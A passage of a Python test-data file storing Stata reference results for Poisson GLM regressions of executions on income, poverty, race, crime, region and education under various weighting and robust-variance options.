dispers = 2.33496951442172,
deviance_s = 23.34969514421719,
dispers_s = 2.33496951442172,
deviance_p = 30.06164170990202,
dispers_p = 3.006164170990202,
deviance_ps = 30.06164170990202,
dispers_ps = 3.006164170990202,
bic = -4.982438296344967,
nbml = 0,
N = 17,
ic = 3,
k = 7,
k_eq = 1,
k_dv = 1,
converged = 1,
k_autoCns = 0,
ll = -52.96941847346162,
chi2 = 356.6637749656061,
p = 5.72458312679e-74,
rc = 0,
aic = 7.055225702760191,
rank = 7,
canonical = 1,
power = 0,
df_m = 6,
df = 10,
vf = 1,
phi = 1,
k_eq_model = 0,
properties = "b V",
depvar = "executions",
which = "max",
technique = "nr",
singularHmethod = "m-marquardt",
ml_method = "e2",
crittype = "log pseudolikelihood",
user = "glim_lf",
title = "Generalized linear models",
opt = "moptimize",
chi2type = "Wald",
wtype = "pweight",
wexp = "= fweight",
link = "glim_l03",
varfunc = "glim_v3",
m = "1",
a = "1",
oim = "oim",
opt1 = "ML",
varfuncf = "u",
varfunct = "Poisson",
linkf = "ln(u)",
linkt = "Log",
vcetype = "Robust",
hac_lag = "15",
marginsok = "default",
marginsnotok = "stdp Anscombe Cooksd Deviance Hat Likelihood Pearson Response Score Working ADJusted STAndardized STUdentized MODified",
predict = "glim_p",
cmd = "glm",
cmdline = "glm executions income perpoverty perblack LN_VC100k96 south degree [pweight=fweight], family(poisson)",
)
# Parameter table, 7 regressors x 9 statistics (colnames below).
params_table = np.array([
.00025343868829, .0000298866597, 8.4799937786829, 2.252059827e-17,
.00019486191167, .00031201546491, np.nan, 1.9599639845401,
0, .09081422305585, .08414617969117, 1.0792435662456,
.28047916301946, -.07410925857549, .25573770468718, np.nan,
1.9599639845401, 0, -.09416451429381, .01946961498728,
-4.8364856909253, 1.321547815e-06, -.13232425846174, -.05600477012587,
np.nan, 1.9599639845401, 0, .27652273809506,
.36112179485191, .76573261995571, .44383541350407, -.43126297384714,
.98430845003726, np.nan, 1.9599639845401, 0,
2.239890838384, .43098853454849, 5.1971007551989, 2.024206636e-07,
1.3951688329193, 3.0846128438487, np.nan, 1.9599639845401,
0, -18.842583191417, 4.5147658917489, -4.1735460139479,
.00002998950578, -27.691361737874, -9.9938046449589, np.nan,
1.9599639845401, 0, -6.5630017977416, 3.3999612612355,
-1.930316639948, .0535676165153, -13.226803418595, .10079982311137,
np.nan, 1.9599639845401, 0]).reshape(7,9)
params_table_colnames = 'b se z pvalue ll ul df crit eform'.split()
params_table_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
# 7x7 parameter covariance matrix (robust, per `vcetype` above).
cov = np.array([
8.932124278e-10, 1.512127962e-06, 1.877263788e-07, -4.562869239e-06,
-2.023379829e-06, -.00001228516761, -.00002423071544, 1.512127962e-06,
.00708057955662, .00028427703202, -.0019549511748, -.00596332288528,
.20022061835302, -.18678265108673, 1.877263788e-07, .00028427703202,
.00037906590775, -.00453407701816, -.00623061980467, -.04659404972535,
.02694184589715, -4.562869239e-06, -.0019549511748, -.00453407701816,
.13040895071706, .0836259691825, .89260578257395, -.82275604425197,
-2.023379829e-06, -.00596332288528, -.00623061980467, .0836259691825,
.18575111691225, 1.0698498854979, -.64859219982217, -.00001228516761,
.20022061835302, -.04659404972535, .89260578257395, 1.0698498854979,
20.383111057299, -12.482192460755, -.00002423071544, -.18678265108673,
.02694184589715, -.82275604425197, -.64859219982217, -12.482192460755,
11.559736577902]).reshape(7,7)
cov_colnames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
# Information criteria row (N, ll0, ll, df, AIC, BIC); ll0 not reported.
infocrit = np.array([
17, np.nan, -52.969418473462, 7,
119.93883694692, 125.77133035532])
infocrit_colnames = 'N ll0 ll df AIC BIC'.split()
infocrit_rownames = '.'.split()
# Per-observation predictions; only 2 columns in this run (no predict_hat),
# hence reshape(17,2) rather than (17,3).
predicted = np.array([
34.815238952637, .06858423352242, 7.3026847839355, .25687274336815,
1.2540435791016, .41320022940636, 3.9734709262848, .16020278632641,
2.0739872455597, .22170753777027, 1.1471545696259, .51121062040329,
1.7763512134552, .2167394310236, 2.2698366641998, .2456086575985,
1.6349502801895, .25546172261238, 2.7504913806915, .4417819082737,
2.862185716629, .61734634637833, 3.5617923736572, .51518148183823,
2.6135795116425, .34006628394127, .775799036026, .292076587677,
.93375068902969, .39795544743538, .56681954860687, .31529840826988,
1.8914022445679, .26116076111794]).reshape(17,2)
predicted_colnames = 'predict_mu predict_linpred_std'.split()
predicted_rownames = 'r1 r2 r3 r4 r5 r6 r7 r8 r9 r10 r11 r12 r13 r14 r15 r16 r17'.split()
resids = np.array([
2.1847612857819, 2.1847612857819, .36650228500366, .36649596691132,
.3702706694603, .06275302171707, 1.6973150968552, 1.6973150968552,
.60597640275955, .60585051774979, .62808901071548, .23242343962193,
4.7459564208984, 4.7459564208984, 3.0897438526154, 3.0483965873718,
4.2380628585815, 3.7845225334167, .02652905881405, .02652905881405,
.01329397037625, .01329396758229, .01330873556435, .00667654490098,
.92601269483566, .92601269483566, .60273587703705, .60233747959137,
.64300429821014, .44648909568787, .8528453707695, .8528453707695,
.72065913677216, .71955502033234, .7962681055069, .7434441447258,
.22364875674248, .22364875674248, .16446639597416, .16445553302765,
.16780391335487, .12590345740318, -.26983660459518, -.26983660459518,
-.1828535348177, -.18284019827843, -.1791032999754, -.11887931078672,
-.63495022058487, -.63495022058487, -.53598040342331, -.53542107343674,
-.49657794833183, -.38836058974266, -1.7504912614822, -1.7504912614822,
-1.2204585075378, -1.2154930830002, -1.0554916858673, -.63642859458923,
-1.862185716629, -1.862185716629, -1.2788465023041, -1.2732635736465,
-1.1007128953934, -.65061664581299, -2.5617923736572, -2.5617923736572,
-1.617108464241, -1.6071890592575, -1.3574055433273, -.71924245357513,
-1.6135795116425, -1.6135795116425, -1.1469231843948, -1.1426799297333,
-.99809640645981, -.61738300323486, .22420094907284, .22420094907284,
.24363535642624, .24356025457382, .25454398989677, .28899359703064,
.06624934077263, .06624934077263, .06777309626341, .06777160614729,
.06855925172567, .07094971090555, .43318045139313, .43318045139313,
.51954871416092, .51871728897095, .57536894083023, .76422989368439,
-.89140218496323, -.89140218496323, -.7140833735466, -.7128586769104,
-.64815932512283, -.47129172086716]).reshape(17,6)
resids_colnames = 'score_factor resid_response resid_anscombe resid_deviance resid_pearson resid_working'.split()
resids_rownames = 'r1 r2 r3 r4 r5 r6 r7 r8 r9 r10 r11 r12 r13 r14 r15 r16 r17'.split()
results_poisson_pweight_nonrobust = Bunch(
params_table=params_table,
params_table_colnames=params_table_colnames,
params_table_rownames=params_table_rownames,
cov=cov,
cov_colnames=cov_colnames,
cov_rownames=cov_rownames,
infocrit=infocrit,
infocrit_colnames=infocrit_colnames,
infocrit_rownames=infocrit_rownames,
predicted=predicted,
predicted_colnames=predicted_colnames,
predicted_rownames=predicted_rownames,
resids=resids,
resids_colnames=resids_colnames,
resids_rownames=resids_rownames,
**est
)
# Stata e() scalars/macros for the unweighted robust (HC1) run — see the
# `cmdline` entry below: glm ..., family(poisson) vce(robust).
est = dict(
           k_eq_model = 0,
           phi = 1,
           vf = 1,
           df = 10,
           df_m = 6,
           power = 0,
           canonical = 1,
           rank = 7,
           aic = 4.579685683305704,
           rc = 0,
           p = 5.09268495340e-76,
           chi2 = 366.2131475852884,
           ll = -31.92732830809848,
           k_autoCns = 0,
           converged = 1,
           k_dv = 1,
           k_eq = 1,
           k = 7,
           ic = 3,
           N = 17,
           nbml = 0,
           bic = -9.740492454486454,
           dispers_ps = 2.475374834715614,
           deviance_ps = 24.75374834715614,
           dispers_p = 2.475374834715614,
           deviance_p = 24.75374834715614,
           dispers_s = 1.859164098607571,
           deviance_s = 18.59164098607571,
           dispers = 1.859164098607571,
           deviance = 18.59164098607571,
           cmdline = "glm executions income perpoverty perblack LN_VC100k96 south degree, family(poisson) vce(robust)",
           cmd = "glm",
           predict = "glim_p",
           marginsnotok = "stdp Anscombe Cooksd Deviance Hat Likelihood Pearson Response Score Working ADJusted STAndardized STUdentized MODified",
           marginsok = "default",
           hac_lag = "15",
           vcetype = "Robust",
           vce = "robust",
           linkt = "Log",
           linkf = "ln(u)",
           varfunct = "Poisson",
           varfuncf = "u",
           opt1 = "ML",
           oim = "oim",
           a = "1",
           m = "1",
           varfunc = "glim_v3",
           link = "glim_l03",
           chi2type = "Wald",
           opt = "moptimize",
           title = "Generalized linear models",
           user = "glim_lf",
           crittype = "log pseudolikelihood",
           ml_method = "e2",
           singularHmethod = "m-marquardt",
           technique = "nr",
           which = "max",
           depvar = "executions",
           properties = "b V",
          )
# 7x9 coefficient table (rows = regressors, columns per params_table_colnames).
params_table = np.array([
.00026110166569, .00003534474167, 7.3872845963787, 1.498576223e-13,
.00019182724497, .0003303760864, np.nan, 1.9599639845401,
0, .07781804809828, .09819599835909, .79247677500784,
.42808272865983, -.11464257211148, .27027866830805, np.nan,
1.9599639845401, 0, -.09493110013466, .01944446025221,
-4.8821668950083, 1.049263903e-06, -.13304154192782, -.0568206583415,
np.nan, 1.9599639845401, 0, .29693462055586,
.34917491559373, .85038932436186, .39510866948496, -.38743563831266,
.98130487942439, np.nan, 1.9599639845401, 0,
2.3011832004524, .45717041903387, 5.0335347709405, 4.815174289e-07,
1.405145644349, 3.1972207565559, np.nan, 1.9599639845401,
0, -18.722067603077, 4.5006120067298, -4.1598937155841,
.00003183957242, -27.543105044656, -9.9010301614985, np.nan,
1.9599639845401, 0, -6.8014789919532, 3.48445447794,
-1.9519494471841, .05094420680386, -13.630884274485, .02792629057847,
np.nan, 1.9599639845401, 0]).reshape(7,9)
params_table_colnames = 'b se z pvalue ll ul df crit eform'.split()
params_table_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
# 7x7 robust variance-covariance matrix of the estimates.
cov = np.array([
1.249250764e-09, 2.158351725e-06, 1.068227835e-07, -5.170410321e-06,
-5.047866044e-07, -.00001662944527, -.00004339679838, 2.158351725e-06,
.00964245409374, .00008635335196, -.00640596402935, -.00524426268669,
.23390140895418, -.22653903184676, 1.068227835e-07, .00008635335196,
.0003780870345, -.00382751790532, -.0064534643179, -.05137117620883,
.02948709519544, -5.170410321e-06, -.00640596402935, -.00382751790532,
.12192312167989, .0907733380116, .89729289134262, -.69004336039169,
-5.047866044e-07, -.00524426268669, -.0064534643179, .0907733380116,
.20900479203961, .93952111535021, -.75843860743141, -.00001662944527,
.23390140895418, -.05137117620883, .89729289134262, .93952111535021,
20.25550843512, -12.691830440798, -.00004339679838, -.22653903184676,
.02948709519544, -.69004336039169, -.75843860743141, -12.691830440798,
12.141423008836]).reshape(7,7)
cov_colnames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
# Information-criterion row: N, ll0, ll, df, AIC, BIC (ll0 not reported -> NaN).
infocrit = np.array([
17, np.nan, -31.927328308098, 7,
77.854656616197, 83.68715002459])
infocrit_colnames = 'N ll0 ll df AIC BIC'.split()
infocrit_rownames = '.'.split()
# Per-observation predictions: fitted mean and linear-predictor std. error.
predicted = np.array([
35.226364135742, .05631958693266, 8.1965742111206, .14089094102383,
1.3118965625763, .51714926958084, 3.6862981319427, .20286601781845,
2.0823004245758, .27275583148003, 1.0650315284729, .58616667985916,
1.9260421991348, .30098018050194, 2.4171404838562, .34251752495766,
1.8473218679428, .29685723781586, 2.8643238544464, .47364214062691,
3.1211984157562, .72507524490356, 3.338207244873, .54493451118469,
2.5269968509674, .34425318241119, .89725440740585, .37162157893181,
.97933322191238, .50227928161621, .53462094068527, .40906101465225,
1.9790935516357, .33805811405182]).reshape(17,2)
predicted_colnames = 'predict_mu predict_linpred_std'.split()
predicted_rownames = 'r1 r2 r3 r4 r5 r6 r7 r8 r9 r10 r11 r12 r13 r14 r15 r16 r17'.split()
# Bundle everything for the unweighted / HC1 case.
results_poisson_none_hc1 = Bunch(
    params_table=params_table,
    params_table_colnames=params_table_colnames,
    params_table_rownames=params_table_rownames,
    cov=cov,
    cov_colnames=cov_colnames,
    cov_rownames=cov_rownames,
    infocrit=infocrit,
    infocrit_colnames=infocrit_colnames,
    infocrit_rownames=infocrit_rownames,
    predicted=predicted,
    predicted_colnames=predicted_colnames,
    predicted_rownames=predicted_rownames,
    **est
    )
# Stata e() scalars/macros for the frequency-weighted robust (HC1) run — see
# `cmdline` below: glm ... [fweight=fweight], family(poisson) vce(robust).
# Note df=26 and N=33: with fweights Stata counts the expanded sample.
est = dict(
           k_eq_model = 0,
           phi = 1,
           vf = 1,
           df = 26,
           df_m = 6,
           power = 0,
           canonical = 1,
           rank = 7,
           aic = 3.634510210512826,
           rc = 0,
           p = 1.5690245831e-115,
           chi2 = 549.7874580263729,
           ll = -52.96941847346162,
           k_autoCns = 0,
           converged = 1,
           k_dv = 1,
           k_eq = 1,
           k = 7,
           ic = 3,
           N = 33,
           nbml = 0,
           bic = -67.5595014539113,
           dispers_ps = 1.156216988842385,
           deviance_ps = 30.06164170990202,
           dispers_p = 1.156216988842385,
           deviance_p = 30.06164170990202,
           dispers_s = .8980651978545075,
           deviance_s = 23.34969514421719,
           dispers = .8980651978545075,
           deviance = 23.34969514421719,
           cmdline = "glm executions income perpoverty perblack LN_VC100k96 south degree [fweight=fweight], family(poisson) vce(robust)",
           cmd = "glm",
           predict = "glim_p",
           marginsnotok = "stdp Anscombe Cooksd Deviance Hat Likelihood Pearson Response Score Working ADJusted STAndardized STUdentized MODified",
           marginsok = "default",
           hac_lag = "15",
           vcetype = "Robust",
           vce = "robust",
           linkt = "Log",
           linkf = "ln(u)",
           varfunct = "Poisson",
           varfuncf = "u",
           opt1 = "ML",
           oim = "oim",
           a = "1",
           m = "1",
           varfunc = "glim_v3",
           link = "glim_l03",
           wexp = "= fweight",
           wtype = "fweight",
           chi2type = "Wald",
           opt = "moptimize",
           title = "Generalized linear models",
           user = "glim_lf",
           crittype = "log pseudolikelihood",
           ml_method = "e2",
           singularHmethod = "m-marquardt",
           technique = "nr",
           which = "max",
           depvar = "executions",
           properties = "b V",
          )
# 7x9 coefficient table (rows = regressors, columns per params_table_colnames).
params_table = np.array([
.00025343868829, .0000263369674, 9.6229259983619, 6.398464168e-22,
.00020181918073, .00030505819585, np.nan, 1.9599639845401,
0, .09081422305585, .07431850776812, 1.2219597215163,
.22172285914198, -.05484737555444, .23647582166613, np.nan,
1.9599639845401, 0, -.09416451429381, .01609416304158,
-5.8508487860178, 4.890707145e-09, -.12570849421662, -.06262053437099,
np.nan, 1.9599639845401, 0, .27652273809506,
.34481886883624, .80193621372381, .42258985672342, -.3993098260138,
.95235530220392, np.nan, 1.9599639845401, 0,
2.239890838384, .39682271484988, 5.6445630619491, 1.656012749e-08,
1.4621326090308, 3.0176490677372, np.nan, 1.9599639845401,
0, -18.842583191417, 4.1473740870735, -4.5432562377589,
5.539185130e-06, -26.971287032495, -10.713879350338, np.nan,
1.9599639845401, 0, -6.5630017977416, 3.0810023455152,
-2.1301515097173, .03315910688542, -12.601655431235, -.52434816424841,
np.nan, 1.9599639845401, 0]).reshape(7,9)
params_table_colnames = 'b se z pvalue ll ul df crit eform'.split()
params_table_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
# 7x7 robust variance-covariance matrix of the estimates.
cov = np.array([
6.936358517e-10, 1.301395377e-06, 1.497821854e-07, -4.758016826e-06,
-1.852598001e-06, -6.904571080e-06, -.00001327109619, 1.301395377e-06,
.00552324059688, .00014714335792, -.00376147485446, -.00118957690573,
.15979100738539, -.13853266210904, 1.497821854e-07, .00014714335792,
.00025902208401, -.00418693954572, -.00513741847691, -.03987504442994,
.02761179707845, -4.758016826e-06, -.00376147485446, -.00418693954572,
.1189000523055, .08682729933237, .80541854027627, -.70545315416752,
-1.852598001e-06, -.00118957690573, -.00513741847691, .08682729933237,
.15746826702083, 1.1366624064282, -.75098089879076, -6.904571080e-06,
.15979100738539, -.03987504442994, .80541854027627, 1.1366624064282,
17.200711818129, -11.062121016981, -.00001327109619, -.13853266210904,
.02761179707845, -.70545315416752, -.75098089879076, -11.062121016981,
9.49257545307]).reshape(7,7)
cov_colnames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
# Information-criterion row: N, ll0, ll, df, AIC, BIC (ll0 not reported -> NaN).
infocrit = np.array([
33, np.nan, -52.969418473462, 7,
119.93883694692, 130.41438987719])
infocrit_colnames = 'N ll0 ll df AIC BIC'.split()
infocrit_rownames = '.'.split()
# Per-observation predictions: fitted mean and linear-predictor std. error.
predicted = np.array([
34.815238952637, .06608480215073, 7.3026847839355, .23366995155811,
1.2540435791016, .39606991410255, 3.9734709262848, .12350843846798,
2.0739872455597, .18263976275921, 1.1471545696259, .39735752344131,
1.7763512134552, .17952646315098, 2.2698366641998, .21028706431389,
1.6349502801895, .17675416171551, 2.7504913806915, .42150634527206,
2.862185716629, .58209121227264, 3.5617923736572, .49835306406021,
2.6135795116425, .2456089258194, .775799036026, .23251366615295,
.93375068902969, .35320028662682, .56681954860687, .26245352625847,
1.8914022445679, .20374123752117]).reshape(17,2)
predicted_colnames = 'predict_mu predict_linpred_std'.split()
predicted_rownames = 'r1 r2 r3 r4 r5 r6 r7 r8 r9 r10 r11 r12 r13 r14 r15 r16 r17'.split()
# Bundle everything for the fweight / HC1 case.
results_poisson_fweight_hc1 = Bunch(
    params_table=params_table,
    params_table_colnames=params_table_colnames,
    params_table_rownames=params_table_rownames,
    cov=cov,
    cov_colnames=cov_colnames,
    cov_rownames=cov_rownames,
    infocrit=infocrit,
    infocrit_colnames=infocrit_colnames,
    infocrit_rownames=infocrit_rownames,
    predicted=predicted,
    predicted_colnames=predicted_colnames,
    predicted_rownames=predicted_rownames,
    **est
    )
# Stata e() scalars/macros for the analytic-weight robust (HC1) run — see
# `cmdline` below: glm ... [aweight=fweight], family(poisson) vce(robust).
est = dict(
           k_eq_model = 0,
           phi = 1,
           vf = 1,
           df = 10,
           df_m = 6,
           power = 0,
           canonical = 1,
           rank = 7,
           aic = 4.033797198035106,
           rc = 0,
           p = 5.72458312675e-74,
           chi2 = 356.663774965618,
           ll = -27.28727618329841,
           k_autoCns = 0,
           converged = 1,
           k_dv = 1,
           k_eq = 1,
           k = 7,
           ic = 3,
           N = 17,
           nbml = 0,
           bic = -16.30350260869269,
           dispers_ps = 1.548630027479802,
           deviance_ps = 15.48630027479802,
           dispers_p = 1.548630027479802,
           deviance_p = 15.48630027479802,
           dispers_s = 1.202863083186947,
           deviance_s = 12.02863083186947,
           dispers = 1.202863083186947,
           deviance = 12.02863083186947,
           cmdline = "glm executions income perpoverty perblack LN_VC100k96 south degree [aweight=fweight], family(poisson) vce(robust)",
           cmd = "glm",
           predict = "glim_p",
           marginsnotok = "stdp Anscombe Cooksd Deviance Hat Likelihood Pearson Response Score Working ADJusted STAndardized STUdentized MODified",
           marginsok = "default",
           hac_lag = "15",
           vcetype = "Robust",
           vce = "robust",
           linkt = "Log",
           linkf = "ln(u)",
           varfunct = "Poisson",
           varfuncf = "u",
           opt1 = "ML",
           oim = "oim",
           a = "1",
           m = "1",
           varfunc = "glim_v3",
           link = "glim_l03",
           wexp = "= fweight",
           wtype = "aweight",
           chi2type = "Wald",
           opt = "moptimize",
           title = "Generalized linear models",
           user = "glim_lf",
           crittype = "log pseudolikelihood",
           ml_method = "e2",
           singularHmethod = "m-marquardt",
           technique = "nr",
           which = "max",
           depvar = "executions",
           properties = "b V",
          )
# 7x9 coefficient table (rows = regressors, columns per params_table_colnames).
params_table = np.array([
.00025343868829, .0000298866597, 8.4799937786833, 2.252059827e-17,
.00019486191167, .00031201546491, np.nan, 1.9599639845401,
0, .09081422305585, .08414617969118, 1.0792435662455,
.28047916301948, -.0741092585755, .25573770468719, np.nan,
1.9599639845401, 0, -.09416451429381, .01946961498728,
-4.8364856909248, 1.321547815e-06, -.13232425846174, -.05600477012587,
np.nan, 1.9599639845401, 0, .27652273809507,
.36112179485206, .76573261995541, .44383541350425, -.43126297384744,
.98430845003758, np.nan, 1.9599639845401, 0,
2.239890838384, .4309885345485, 5.1971007551988, 2.024206636e-07,
1.3951688329193, 3.0846128438488, np.nan, 1.9599639845401,
0, -18.842583191417, 4.5147658917496, -4.1735460139472,
.00002998950578, -27.691361737876, -9.9938046449574, np.nan,
1.9599639845401, 0, -6.5630017977417, 3.3999612612367,
-1.9303166399474, .05356761651539, -13.226803418597, .10079982311369,
np.nan, 1.9599639845401, 0]).reshape(7,9)
params_table_colnames = 'b se z pvalue ll ul df crit eform'.split()
params_table_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
# 7x7 robust variance-covariance matrix of the estimates.
cov = np.array([
8.932124278e-10, 1.512127962e-06, 1.877263788e-07, -4.562869239e-06,
-2.023379829e-06, -.00001228516761, -.00002423071544, 1.512127962e-06,
.00708057955662, .00028427703202, -.00195495117479, -.00596332288528,
.2002206183531, -.1867826510868, 1.877263788e-07, .00028427703202,
.00037906590775, -.00453407701816, -.00623061980468, -.04659404972537,
.02694184589718, -4.562869239e-06, -.00195495117479, -.00453407701816,
.13040895071718, .08362596918255, .89260578257483, -.82275604425296,
-2.023379829e-06, -.00596332288528, -.00623061980468, .08362596918255,
.18575111691226, 1.0698498854982, -.64859219982256, -.00001228516761,
.2002206183531, -.04659404972537, .89260578257483, 1.0698498854982,
20.383111057306, -12.482192460764, -.00002423071544, -.1867826510868,
.02694184589718, -.82275604425296, -.64859219982256, -12.482192460764,
11.55973657791]).reshape(7,7)
cov_colnames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
# Information-criterion row: N, ll0, ll, df, AIC, BIC (ll0 not reported -> NaN).
infocrit = np.array([
17, np.nan, -27.287276183298, 7,
68.574552366597, 74.40704577499])
infocrit_colnames = 'N ll0 ll df AIC BIC'.split()
infocrit_rownames = '.'.split()
# Per-observation predictions: fitted mean and linear-predictor std. error.
predicted = np.array([
34.815238952637, .06858423352242, 7.3026847839355, .25687274336815,
1.2540435791016, .41320022940636, 3.9734709262848, .16020278632641,
2.0739872455597, .22170753777027, 1.1471545696259, .51121062040329,
1.7763512134552, .2167394310236, 2.2698366641998, .2456086575985,
1.6349502801895, .25546172261238, 2.7504913806915, .4417819082737,
2.862185716629, .61734634637833, 3.5617923736572, .51518148183823,
2.6135795116425, .34006628394127, .775799036026, .292076587677,
.93375068902969, .39795544743538, .56681954860687, .31529840826988,
1.8914022445679, .26116076111794]).reshape(17,2)
predicted_colnames = 'predict_mu predict_linpred_std'.split()
predicted_rownames = 'r1 r2 r3 r4 r5 r6 r7 r8 r9 r10 r11 r12 r13 r14 r15 r16 r17'.split()
# Bundle everything for the aweight / HC1 case.
results_poisson_aweight_hc1 = Bunch(
    params_table=params_table,
    params_table_colnames=params_table_colnames,
    params_table_rownames=params_table_rownames,
    cov=cov,
    cov_colnames=cov_colnames,
    cov_rownames=cov_rownames,
    infocrit=infocrit,
    infocrit_colnames=infocrit_colnames,
    infocrit_rownames=infocrit_rownames,
    predicted=predicted,
    predicted_colnames=predicted_colnames,
    predicted_rownames=predicted_rownames,
    **est
    )
# Stata e() scalars/macros for the probability-weight robust (HC1) run — see
# `cmdline` below: glm ... [pweight=fweight], family(poisson) vce(robust).
est = dict(
           k_eq_model = 0,
           phi = 1,
           vf = 1,
           df = 10,
           df_m = 6,
           power = 0,
           canonical = 1,
           rank = 7,
           aic = 7.055225702760191,
           rc = 0,
           p = 5.72458312679e-74,
           chi2 = 356.6637749656061,
           ll = -52.96941847346162,
           k_autoCns = 0,
           converged = 1,
           k_dv = 1,
           k_eq = 1,
           k = 7,
           ic = 3,
           N = 17,
           nbml = 0,
           bic = -4.982438296344967,
           dispers_ps = 3.006164170990202,
           deviance_ps = 30.06164170990202,
           dispers_p = 3.006164170990202,
           deviance_p = 30.06164170990202,
           dispers_s = 2.33496951442172,
           deviance_s = 23.34969514421719,
           dispers = 2.33496951442172,
           deviance = 23.34969514421719,
           cmdline = "glm executions income perpoverty perblack LN_VC100k96 south degree [pweight=fweight], family(poisson) vce(robust)",
           cmd = "glm",
           predict = "glim_p",
           marginsnotok = "stdp Anscombe Cooksd Deviance Hat Likelihood Pearson Response Score Working ADJusted STAndardized STUdentized MODified",
           marginsok = "default",
           hac_lag = "15",
           vcetype = "Robust",
           vce = "robust",
           linkt = "Log",
           linkf = "ln(u)",
           varfunct = "Poisson",
           varfuncf = "u",
           opt1 = "ML",
           oim = "oim",
           a = "1",
           m = "1",
           varfunc = "glim_v3",
           link = "glim_l03",
           wexp = "= fweight",
           wtype = "pweight",
           chi2type = "Wald",
           opt = "moptimize",
           title = "Generalized linear models",
           user = "glim_lf",
           crittype = "log pseudolikelihood",
           ml_method = "e2",
           singularHmethod = "m-marquardt",
           technique = "nr",
           which = "max",
           depvar = "executions",
           properties = "b V",
          )
# 7x9 coefficient table (rows = regressors, columns per params_table_colnames).
params_table = np.array([
.00025343868829, .0000298866597, 8.4799937786829, 2.252059827e-17,
.00019486191167, .00031201546491, np.nan, 1.9599639845401,
0, .09081422305585, .08414617969117, 1.0792435662456,
.28047916301946, -.07410925857549, .25573770468718, np.nan,
1.9599639845401, 0, -.09416451429381, .01946961498728,
-4.8364856909253, 1.321547815e-06, -.13232425846174, -.05600477012587,
np.nan, 1.9599639845401, 0, .27652273809506,
.36112179485191, .76573261995571, .44383541350407, -.43126297384714,
.98430845003726, np.nan, 1.9599639845401, 0,
2.239890838384, .43098853454849, 5.1971007551989, 2.024206636e-07,
1.3951688329193, 3.0846128438487, np.nan, 1.9599639845401,
0, -18.842583191417, 4.5147658917489, -4.1735460139479,
.00002998950578, -27.691361737874, -9.9938046449589, np.nan,
1.9599639845401, 0, -6.5630017977416, 3.3999612612355,
-1.930316639948, .0535676165153, -13.226803418595, .10079982311137,
np.nan, 1.9599639845401, 0]).reshape(7,9)
params_table_colnames = 'b se z pvalue ll ul df crit eform'.split()
params_table_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
# 7x7 robust variance-covariance matrix of the estimates.
cov = np.array([
8.932124278e-10, 1.512127962e-06, 1.877263788e-07, -4.562869239e-06,
-2.023379829e-06, -.00001228516761, -.00002423071544, 1.512127962e-06,
.00708057955662, .00028427703202, -.0019549511748, -.00596332288528,
.20022061835302, -.18678265108673, 1.877263788e-07, .00028427703202,
.00037906590775, -.00453407701816, -.00623061980467, -.04659404972535,
.02694184589715, -4.562869239e-06, -.0019549511748, -.00453407701816,
.13040895071706, .0836259691825, .89260578257395, -.82275604425197,
-2.023379829e-06, -.00596332288528, -.00623061980467, .0836259691825,
.18575111691225, 1.0698498854979, -.64859219982217, -.00001228516761,
.20022061835302, -.04659404972535, .89260578257395, 1.0698498854979,
20.383111057299, -12.482192460755, -.00002423071544, -.18678265108673,
.02694184589715, -.82275604425197, -.64859219982217, -12.482192460755,
11.559736577902]).reshape(7,7)
cov_colnames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
# Information-criterion row: N, ll0, ll, df, AIC, BIC (ll0 not reported -> NaN).
infocrit = np.array([
17, np.nan, -52.969418473462, 7,
119.93883694692, 125.77133035532])
infocrit_colnames = 'N ll0 ll df AIC BIC'.split()
infocrit_rownames = '.'.split()
# Per-observation predictions: fitted mean and linear-predictor std. error.
predicted = np.array([
34.815238952637, .06858423352242, 7.3026847839355, .25687274336815,
1.2540435791016, .41320022940636, 3.9734709262848, .16020278632641,
2.0739872455597, .22170753777027, 1.1471545696259, .51121062040329,
1.7763512134552, .2167394310236, 2.2698366641998, .2456086575985,
1.6349502801895, .25546172261238, 2.7504913806915, .4417819082737,
2.862185716629, .61734634637833, 3.5617923736572, .51518148183823,
2.6135795116425, .34006628394127, .775799036026, .292076587677,
.93375068902969, .39795544743538, .56681954860687, .31529840826988,
1.8914022445679, .26116076111794]).reshape(17,2)
predicted_colnames = 'predict_mu predict_linpred_std'.split()
predicted_rownames = 'r1 r2 r3 r4 r5 r6 r7 r8 r9 r10 r11 r12 r13 r14 r15 r16 r17'.split()
# Bundle everything for the pweight / HC1 case.
results_poisson_pweight_hc1 = Bunch(
    params_table=params_table,
    params_table_colnames=params_table_colnames,
    params_table_rownames=params_table_rownames,
    cov=cov,
    cov_colnames=cov_colnames,
    cov_rownames=cov_rownames,
    infocrit=infocrit,
    infocrit_colnames=infocrit_colnames,
    infocrit_rownames=infocrit_rownames,
    predicted=predicted,
    predicted_colnames=predicted_colnames,
    predicted_rownames=predicted_rownames,
    **est
    )
# Stata e() scalars/macros for the unweighted cluster-robust run — see
# `cmdline` below: glm ..., family(poisson) vce(cluster id); N_clust = 9.
est = dict(
           k_eq_model = 0,
           vf = 1,
           df = 10,
           df_m = 6,
           power = 0,
           canonical = 1,
           rank = 7,
           aic = 4.579685683305704,
           rc = 0,
           p = 4.1950730971e-123,
           chi2 = 584.908728768987,
           ll = -31.92732830809848,
           N_clust = 9,
           k_autoCns = 0,
           converged = 1,
           k_dv = 1,
           k_eq = 1,
           k = 7,
           ic = 3,
           N = 17,
           nbml = 0,
           bic = -9.740492454486454,
           dispers_ps = 2.475374834715614,
           deviance_ps = 24.75374834715614,
           dispers_p = 2.475374834715614,
           deviance_p = 24.75374834715614,
           dispers_s = 1.859164098607571,
           deviance_s = 18.59164098607571,
           dispers = 1.859164098607571,
           deviance = 18.59164098607571,
           phi = 1,
           cmdline = "glm executions income perpoverty perblack LN_VC100k96 south degree, family(poisson) vce(cluster id)",
           cmd = "glm",
           predict = "glim_p",
